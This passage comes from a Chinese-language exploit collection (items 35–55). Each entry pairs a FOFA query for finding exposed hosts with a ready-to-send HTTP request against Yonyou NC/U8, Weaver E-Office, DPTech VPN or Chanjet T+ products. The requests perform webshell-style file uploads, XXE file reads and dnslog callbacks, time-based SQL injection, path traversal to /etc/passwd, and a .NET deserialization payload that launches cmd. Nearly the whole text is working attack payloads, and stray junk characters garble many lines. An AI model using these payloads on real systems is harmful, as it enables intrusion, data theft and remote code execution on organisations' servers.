% Q8 n& m! ~1 k! _9 \! }0 ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- g8 q; C7 ]& z6 ?1 {Content-Type: application/x-www-form-urlencoded# [7 {  I/ n0 P0 b& W2 ?
Accept-Encoding: gzip, deflate, M8 I6 |) z; ]. p  e+ u7 c
Accept: */*8 ~, Q# L% Y( J) ?; c
Connection: keep-alive1 p' \1 t2 c5 z

+ T% G* _' o+ D, {0 t! z8 m3 z' \( D4 `0 O" E
35. 用友NC-Cloud importhttpscer任意文件上传
6 H7 M& a; _* W8 OFOFA:app="用友-NC-Cloud"3 w, t: r: M- d  k* h
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1  s4 O. s- X1 T
Host: 203.25.218.166:8888, [* h+ |' r7 j- O! p
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
, l8 e1 F& B9 oAccept-Encoding: gzip, deflate" v% q* |* Q$ ]% p  v9 ^5 d8 [
Accept: */*9 b; |" h  ?  L# R+ R, {
Connection: close
, F$ z6 y( L- V; B: P- x% I5 EaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA5 N) ~( |3 R  x3 C1 K- B1 ^9 t
Content-Length: 190) b. ?) s2 U' y6 ?% B# r1 b
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0& {; m6 i1 i1 B
% G( s# y/ ~) T: S2 |' |: j
--fd28cb44e829ed1c197ec3bc71748df0
' W4 s. p- x! gContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
% |0 j/ F3 V6 H6 E( Y9 B7 z3 e9 @3 B% ?! s* B, L4 x, Z1 V
<%out.println(1111*1111);%>$ A1 ^) t- f. T+ @' [+ ?6 z: Q
--fd28cb44e829ed1c197ec3bc71748df0--( m& H! F4 v7 L, i
$ ~/ s3 H! `& L

. j) \2 `# {* E/ h" _36. 用友NC-Cloud soapFormat XXE  n- t: M* f  x# ~/ ?% A4 J
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"# ]5 r0 T0 ?* g
POST /uapws/soapFormat.ajax HTTP/1.1
2 l/ T7 T7 @) E% nHost: 192.168.40.130:8989: d" o' z9 S0 Q- Y3 ?& Y4 [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
- o/ G! m' T1 {; e9 k8 AContent-Length: 263
9 S1 D9 h! v& ?0 N) @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 }! l; I2 S$ V; G4 H6 N2 x9 `6 FAccept-Encoding: gzip, deflate
4 Y; F3 A; q8 a' @8 n4 B& L+ BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, A. D1 W$ \1 _, r
Connection: close* X" T% _  B8 T( J& K5 W* C, u
Content-Type: application/x-www-form-urlencoded
/ g7 b$ D6 ~& r7 C; f/ M3 c- P; s, bUpgrade-Insecure-Requests: 18 Y: Y9 H7 D: b4 Y- n4 c

' |7 o4 m  R, J# O: k8 x6 m5 u( {9 Dmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
3 M1 B4 Y% E4 R. C/ v7 Q( z
' V3 G/ G: P- a6 }/ J0 a8 ~4 O& V
' B0 }4 Q: {+ `; s1 \$ g37. 用友NC-Cloud IUpdateService XXE8 R. P; G4 \* W
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"6 r7 @3 K: [& ~4 }# q! n
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1- P  ]- u* n5 i$ M8 j% |; E: a
Host: 192.168.40.130:8989
+ r: g5 j. [/ M! D% ^" s: `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
9 q/ j8 m4 i% g7 w) K; LContent-Length: 421
  J4 {  P. j' D/ E6 k  m/ zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9+ u' f( \' c+ A7 }
Accept-Encoding: gzip, deflate/ z- o7 N! s6 k% z' f$ G
Accept-Language: zh-CN,zh;q=0.9
& m+ ?3 x; z, |1 a' s8 fConnection: close4 b$ W3 X- M7 [4 ?
Content-Type: text/xml;charset=UTF-8
* s2 g& f' m. X1 TSOAPAction: urn:getResult
  n; j) b  M9 _6 ?. h& qUpgrade-Insecure-Requests: 1
; y( g. ?; v9 e, p2 k- @& T" Y; q& K# |+ ^$ \9 f. {4 y3 d" g
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">) m0 W6 z) L. ^# ~
<soapenv:Header/># X8 _7 E& R  N2 w. M
<soapenv:Body>
+ o) d  M: S" w! U* a<iup:getResult>$ L2 i* f$ I$ C+ }. h
<!--type: string-->7 Z( e3 T+ u, ?: F0 ?
<iup:string><![CDATA[3 U0 u* q3 e9 i* \' `
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
9 y" L4 C/ k' J& D- p7 J<xxx/>]]></iup:string>
. r; T# I$ |, O, H( l+ y# H0 p1 I</iup:getResult># P* {3 g3 p9 Z3 P. x" s* q
</soapenv:Body>
) i0 a# P. L  K5 |) V</soapenv:Envelope>( P) D" F* V  O( F

; X% a0 G+ J6 S/ H- j' e" f% K( i2 b" T: `5 h6 \3 M* F

$ D0 }9 f: c% g0 |# H4 t, Q  g38. 用友U8 Cloud smartweb2.RPC.d XXE% _* D' G1 Q8 ^! v, N& C+ c
FOFA:app="用友-U8-Cloud"
* b4 y& _, t# E. G4 WPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
- [! ~2 B9 [! Q. z# K1 RHost: 192.168.40.131:8088
; e8 z2 D% W/ q3 cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
8 O( [' i: ]1 n/ a. GContent-Length: 260( F( }' C% {# X1 A! i" ^/ s6 L+ R5 E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3/ r% `( n9 S9 ?9 |" @5 h
Accept-Encoding: gzip, deflate
" r, L+ O6 A/ LAccept-Language: zh-CN,zh;q=0.9
; K0 c- n7 ^1 T5 lConnection: close
# n, u9 K7 i/ h$ j, Q- r- rContent-Type: application/x-www-form-urlencoded
: j5 ~* `- y9 k  N" L
4 u% M/ Z# c+ H" f8 M7 o3 E__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
5 W! A  I1 Y4 W9 z, o
8 z- n6 s" R( K6 ]# |2 L1 @
; m$ p& H0 _3 @  x! S39. 用友U8 Cloud RegisterServlet SQL注入
: ], P+ i2 ^" ~8 Q) Z% wFOFA:title="u8c"0 O5 T9 T0 A, [! N& h6 y# U
POST /servlet/RegisterServlet HTTP/1.1! Y6 v$ _6 d0 R% \
Host: 192.168.86.128:8089: ~2 \/ e( P* N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36+ w% \  s2 w$ A4 H3 q
Connection: close1 x, y# d5 {! P2 v( {( d- l& e7 T1 ~
Content-Length: 853 d8 q1 B5 r: C5 k4 h8 [8 z! L6 C+ {
Accept: */*
5 e) k! G( n0 k3 h* L% V1 g- [Accept-Language: en+ n) ~! X! k, B. s
Content-Type: application/x-www-form-urlencoded
- }4 z4 C2 E' }6 C4 ?6 eX-Forwarded-For: 127.0.0.1$ H7 `4 {( E6 h/ b! L$ S+ B# v% g! _2 `
Accept-Encoding: gzip
' p# s5 c+ @# |. r/ P6 O
# Y( F1 }4 L5 G: z1 cusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
: d9 w  k6 @2 C! N5 L  E! B$ U9 H7 o% p. `7 A
0 [" n3 @0 f$ Z( R- @
40. 用友U8-Cloud XChangeServlet XXE5 j/ f6 m% a2 \: q
FOFA:app="用友-U8-Cloud"
5 ?: ]7 f2 j; j% `/ hPOST /service/XChangeServlet HTTP/1.16 `/ B" F$ F5 [0 C  t% S
Host: x.x.x.x2 q9 k: _0 C4 y: J
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36; W& t$ c5 ~! ]
Content-Type: text/xml: p  I/ y/ w" G* q
Connection: close6 {8 [2 b9 X* O
+ t3 `( k: R9 j- d
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>0 b/ D; E+ G* N4 q6 j& K

- h6 n  u* J, S* w% A
8 [9 E$ r5 u, ?# v. m6 P41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
9 ]: o% c( `: FFOFA:app="用友-U8-Cloud"
8 t/ r- C5 J1 Q% b  e  I) eGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1; X* t* A- H# i" B2 G1 R$ |
Host:
  Y& d8 O7 q6 V/ w1 g& {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* p0 y% B  W6 ^$ }
Content-Type: application/json4 K3 G' \# R) z9 m: I7 Z, e
Accept-Encoding: gzip
0 d! `* G+ N/ c! JConnection: close
6 Z0 ~! Q! g' W- A& j
7 ~" B% o# p# L
, V- u5 b1 ?9 }" @, n42. 用友GRP-U8 SmartUpload01 文件上传
3 b- n+ V& X$ X6 D2 v* w+ |FOFA:app="用友-GRP-U8"( q% O- N$ N8 _
POST /u8qx/SmartUpload01.jsp HTTP/1.1
- t* V8 y. \1 I. Z6 M! D, pHost: x.x.x.x9 S6 ^, E, h% z) z" @+ v3 @) G
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt' ~- L  n& }4 K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
$ t' H4 R6 m+ e! X+ N: e. I
) c+ q# [+ i% iPAYLOAD
4 }: Z0 w' ]3 q! e" G. Q1 T$ q6 j5 w. Y$ g: Q# V/ O
/ Q; T# I1 `% ~" [. H
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
5 d$ e. t) @: t2 ]1 B" F
/ b. I% {- {8 i) m4 B43. 用友GRP-U8 userInfoWeb SQL注入致RCE  u: t! F  ^: h1 ^
FOFA:app="用友-GRP-U8"/ k! X+ ]* X7 I- \
POST /services/userInfoWeb HTTP/1.1* U) T2 x! j7 P3 y! _; n- n+ |! t# H
Host: your-ip
- Z- s5 z+ _- ^) i% M- _8 FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36* r( X0 ^  Y- d! E) p4 n6 f& ^! X# `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 a) D! e' y( k- o* `" \: f, Y4 ]Accept-Encoding: gzip, deflate% |: P5 l5 m6 i6 @+ [
Accept-Language: zh-CN,zh;q=0.95 `5 M( L3 Q& S7 A6 z
Connection: close4 S1 f, K9 E5 S7 f" t; d/ n$ z$ J
SOAPAction:, C8 @( X' X. f# O$ \( _
Content-Type: text/xml;charset=UTF-8
0 u7 n3 D. l+ _
$ L2 r. a* Y8 x: f3 d; `  N<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
+ }9 E/ T) m. {; w   <soapenv:Header/>
/ `8 B! L5 j+ A: W9 M7 p  a   <soapenv:Body>9 D1 v0 V" D: y# @( J( B8 R+ Q+ r
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
4 r; b- T. a  ~         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>- l3 ]+ G' v" {  e5 k, P6 ~1 X! l( U! |
      </ser:getUserNameById>5 l' L% y5 K3 H# g/ U
   </soapenv:Body>3 q2 d8 n+ B- K- j, N, k
</soapenv:Envelope>
( M) x1 k% j3 ~
( X, n  X$ z2 A1 _& @$ \; r* ~% w/ E& X, }
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
9 I  N6 x6 ]3 D' m' KFOFA:app="用友-GRP-U8"1 I. w* k! r! a, k
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
/ L. J5 K! D) XHost: your-ip
' B: w& t# J9 y( X* m* y- p) T# JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
# Y4 }( b" I# N& hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 E8 b9 B( X+ w( G; tAccept-Encoding: gzip, deflate& ?( |9 P! s8 z- t- T, x
Accept-Language: zh-CN,zh;q=0.9% |5 T/ s2 @' G9 k
Connection: close
# r, }3 s8 _' u( L; D1 m( k* j" e
, S$ M4 F/ H  c  }9 a) _- T6 {: U$ E* O6 f
45. 用友GRP-U8 ufgovbank XXE
8 H3 Z* c6 {( Q* y6 g7 M3 _FOFA:app="用友-GRP-U8"
0 i0 J% e- Z% v; qPOST /ufgovbank HTTP/1.1
6 c6 c1 M* g0 v; J! G: v& AHost: 192.168.40.130:222
/ k$ q% l, Q$ `5 w! i* _# jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
% @- ^% N* f. [& E3 N0 MConnection: close) z3 N/ |6 \* M
Content-Length: 161, q6 p  R2 i  B. b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! O  ^" q9 ?' c1 t- N1 g1 pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! S3 c  b) G; |- j0 @Content-Type: application/x-www-form-urlencoded
$ M  m) U) D1 w2 AAccept-Encoding: gzip
- j/ T0 B4 M) s1 m. t3 A5 ]; r0 x3 Y
reqData=<?xml version="1.0"?>6 l6 S7 W+ R7 y
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
4 ?1 {6 Z3 X, ]0 N) P  S/ j
# }& a2 z! {9 S* y& b% ?& p' K, H. `
46. 用友GRP-U8 sqcxIndex.jsp SQL注入4 c# Q$ E2 v8 @; r
FOFA:app="用友-GRP-U8"0 f% _3 e) K, `* R: B
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1" ?- C, n* E6 l7 o8 M# X5 s
Host: your-ip
3 |$ l% q  x; \7 rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
% H7 i$ `( S! g1 `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 L$ v% C% ~% W" s. n% n# a* T5 qAccept-Encoding: gzip, deflate5 A4 g4 ?  F$ @( c: u1 @4 _
Accept-Language: zh-CN,zh;q=0.9
9 X' p2 s& T) t3 R5 q) FConnection: close
* G0 V' J& e4 ~3 J% ?5 Y8 O- D- r  j7 A3 D% [; l

# y, q; y9 ?- d5 o" l- `0 b$ T47. 用友GRP A++Cloud 政府财务云 任意文件读取/ G- T, B, v7 E' g
FOFA:body="/pf/portal/login/css/fonts/style.css"' A7 m, |; U8 ?- ]
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
% A) ^$ S& g& G. qHost: x.x.x.x
4 X( B8 s; b  N9 _6 aCache-Control: max-age=0
0 Z9 X9 h, w% l6 s" X+ pUpgrade-Insecure-Requests: 1; P" U! I! j  ]6 Z9 i, g- [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
9 N+ m9 `' t$ w4 P/ {# T" ?4 }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# ]& _; {0 {- w# G( i
Accept-Encoding: gzip, deflate, br- w! _4 {$ f% e$ z4 [2 G' y; c
Accept-Language: zh-CN,zh;q=0.98 i& j5 E! a% ~: Q) J/ m
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
% k( Q1 G& D- |$ F" s; N4 RConnection: close
% v2 M: J- T# ?0 D5 i! R- d: `$ ~7 W/ S# }

( i  {& _( M% I; l& \" B$ O1 _8 T$ ]* z. E/ u$ |9 ]3 ~/ J) b  r4 c
48. 用友U8 CRM swfupload 任意文件上传! G( ^) m- T& A% h
FOFA:title="用友U8CRM"# F+ q: n# e3 g! {. O( [
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1* s- `% `; I# R! S
Host: your-ip7 a& W% r; u3 M* w( i5 h* j! V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
7 t- C; {9 V7 e& {% _4 MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: l* _$ _  T6 ?5 I+ Y5 ~+ X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 H. C. U  }, I  j7 KAccept-Encoding: gzip, deflate
! [6 }* p- l2 j& ^% o, o7 CContent-Type: multipart/form-data;boundary=----2695209672394068716424300668556 ^6 F" t+ p; L
------269520967239406871642430066855
6 I3 N4 C7 \6 BContent-Disposition: form-data; name="file"; filename="s.php"
. w8 [6 y2 U5 N) o* r* X/ p1231% e8 J( A5 g" H: g& n; s) h( z
Content-Type: application/octet-stream4 ^3 R9 k) [! |  D0 o+ A: |4 e0 s
------269520967239406871642430066855( Y' y5 E9 @! A/ l* p: H7 z% Q
Content-Disposition: form-data; name="upload"
5 b: d3 H& C; G2 i+ U/ G4 Oupload
5 ~: f6 |# o* |------269520967239406871642430066855--
; j3 i0 `5 \1 y' d: x: s" Y. K  e- ~2 ?: D+ M2 X8 T

" t  P: r0 h- ?5 q) H* m0 P49. 用友U8 CRM系统uploadfile.php接口任意文件上传6 ~( w) Y8 R$ i3 T
FOFA:body="用友U8CRM"
4 T" z5 [! c. Y! x
; W2 W9 {4 N, P3 }+ o& MPOST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
  Z/ N$ V8 X/ L2 MHost: x.x.x.x- [) ?& N2 g9 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.00 ]8 B2 v% f  ~' x
Content-Length: 329
8 N7 N1 ^) }5 W( tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 U- A0 L! _9 `
Accept-Encoding: gzip, deflate+ |4 Z* C4 T% b3 i3 y, S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 v) G3 d- h$ n. ]5 UConnection: close3 K8 Q3 D5 A% n2 m& o
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w4 e; V5 f/ G. Q: H3 q9 z, u

# j7 E; a+ m  |1 y* h; W-----------------------------vvv3wdayqv3yppdxvn3w
6 j3 H2 s6 m) e0 A8 _Content-Disposition: form-data; name="file"; filename="%s.php "
8 C! @8 |2 L3 t/ z1 `Content-Type: application/octet-stream
( o# D, j* T/ Y! c$ n, c0 w- k! d( w0 O! }" B% q. ]5 _8 c
wersqqmlumloqa
5 [7 i# N, d6 d' p) F-----------------------------vvv3wdayqv3yppdxvn3w
( u3 i* [+ d6 k9 T; U, mContent-Disposition: form-data; name="upload"7 w' H4 J+ E- H, r
6 I8 C8 U* {. R$ {
upload
/ G# Q8 }" M4 l1 n% W-----------------------------vvv3wdayqv3yppdxvn3w--# L- J) d* G4 |- C

' a! c# `; a. M9 T0 T" U7 j+ y/ k( S3 H8 \0 N/ F* P4 k
http://x.x.x.x/tmpfile/updB3CB.tmp.php
3 m! r0 U" ~( _0 n$ M
3 D! G) @- C0 w2 C/ ]" g50. QDocs Smart School 6.4.1 filterRecords SQL注入
3 S0 S& u/ l! b7 x) I1 O4 \1 fFOFA:body="close closebtnmodal"' c; A' N5 u, L$ x2 L. F* C3 C3 d9 ^7 ]
POST /course/filterRecords/ HTTP/1.1
  Y; @  v/ c' E9 y' w) N% U% q& wHost: x.x.x.x
& `5 o  a% ?) A8 b/ P, o( cUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36, r& L# W' y. x; c% Z$ Q- t
Connection: close( @* x0 r& `# e! J: d
Content-Length: 224
) o1 o1 v+ t# wAccept: */*$ d8 a$ B( U- `  ?! j2 W. L. |
Accept-Language: en6 L. Q6 O) Q* ^* {* u7 \
Content-Type: application/x-www-form-urlencoded
/ K$ J5 @* _$ jAccept-Encoding: gzip
3 T  d' H. Z+ \( \# g/ J
9 ]( Z: R4 I3 b, ?2 r/ [" hsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1# L* g; {# i7 \

) n9 |, w; }( i) O0 t9 F% y$ [. g3 Q5 C( n. h
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
2 M! J; S4 E- rFOFA:app="云时空社会化商业ERP系统"( x2 m* \& T0 {* e/ |
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
1 Q  Q$ f( R. |- NHost: your-ip) H. b7 L- ?: t1 F
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36" \$ }9 X8 u2 X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
5 T% d* N6 Y2 T8 B( O$ mAccept-Encoding: gzip, deflate
" p* M5 k9 R+ E% ~6 ZAccept-Language: zh-CN,zh;q=0.9
! z' X: e5 M+ `$ t4 p6 yConnection: close
: f; s9 K% c& J/ R, C0 j
( s, g) `3 a  Q0 j( E; T9 `* s7 A
52. 泛微E-Office json_common.php sql注入
! u0 C" }! R% }, @! PFOFA:app="泛微-EOffice"
7 c; n. g/ `7 t. n, B& G& XPOST /building/json_common.php HTTP/1.1# }& Y; {7 }/ _7 c& f7 ~7 C
Host: 192.168.86.128:80972 U: M# M6 T6 a$ k. Q
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
8 k3 c& q& M/ }' P& \Connection: close) J$ V" Z# W9 x0 `$ {) h% W
Content-Length: 87# a, }0 c) P" [- X
Accept: */*6 A, O' A: S2 g6 q+ W
Accept-Language: en
! H5 c: i9 I% r; b5 _Content-Type: application/x-www-form-urlencoded
1 G; Z+ W4 q  c6 }- L1 a/ @Accept-Encoding: gzip
' r: e4 V  H+ b  K$ b3 @2 x, x. J6 [# r: Q) Y0 t
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333+ s3 d6 U- Q) z9 b

1 F/ ]8 X, V( Q# Q
" L. L7 V  A# s3 ?2 F% Q! \5 U53. 迪普 DPTech VPN Service 任意文件上传1 @$ Y3 P- ]! Y2 w; E% r+ j5 i
FOFA:app="DPtech-SSLVPN"
' }& d: q8 z: {& z7 W% d5 q# R/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd/ e5 A' z5 b7 I- k/ m. N6 y

; n0 X5 a( p* ^8 f
  R9 a9 a3 X, I0 D4 b, c  l54. 畅捷通T+ getstorewarehousebystore 远程代码执行
5 i, H* Y5 U1 J; dFOFA:app="畅捷通-TPlus"
7 A: v6 @9 `; q$ C第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
4 a% e7 d7 {1 _6 G, U% b"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
4 ?4 R7 X: h" j
  a; N; O) Y+ V3 C  E* w9 P: a$ @- s. z- L( L
完整数据包
# f! t4 H* S8 J, S7 h; f2 rPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1: `( Y$ |3 p$ e/ @5 f2 p7 B: F6 k
Host: x.x.x.x
; t# H6 M! E: y1 m$ C" c  C# o; MUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F( U1 P  i9 n+ u
Content-Length: 593
8 D3 ^* [6 _, x8 H1 I$ O8 [! v; }! s& ?  _
{$ W5 r; ~& p* H, [
"storeID":{3 v* L4 `% x" x5 N" H
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
1 R, o" D. Z& v! B$ T* u "MethodName":"Start",
6 p, R& P) @1 A! c1 r  "ObjectInstance":{+ N+ ^, g; J( q7 N# B! ]
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
* O, |: Z, a* R3 ?    "StartInfo":{
% j9 ?" x; [/ j. B6 u4 i   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
% {6 n) w% O& H  P$ [    "FileName":"cmd",$ C! P% q  g) ^, Y0 F% s' v
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt", u9 w( X. ]3 u) }+ Z( _) x
    }" R; J4 j' i/ A. c9 r% N2 |, O9 v
  }$ M3 K# U5 X9 B6 m: ?
  }
# D! e( H) y# o( D4 W( g}
" q5 Y# b: Z3 T8 ?( g
& ]2 v; W9 K& X6 M0 [7 }) J9 N9 O4 W/ V# t: B1 |/ m/ w! X
第二步,访问如下url
  s; y7 S0 a" H/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt  c5 T/ q9 i! a' {& \
7 |8 f$ _+ O! C& S/ C7 |
: N4 j6 U+ A$ Z4 q' i
55. 畅捷通T+ getdecallusers信息泄露
+ ~. y: E) ^/ g8 ]; t0 ~FOFA:app="畅捷通-TPlus"% }5 E6 p; A. j
第一步,通过/ X7 Y# d! u. o1 e
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
' n  B' y, ?  O* Z; t: U% [; Y第二步,利用获取到的Cookie请求
# H* J: n1 T4 p) t9 u; c/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
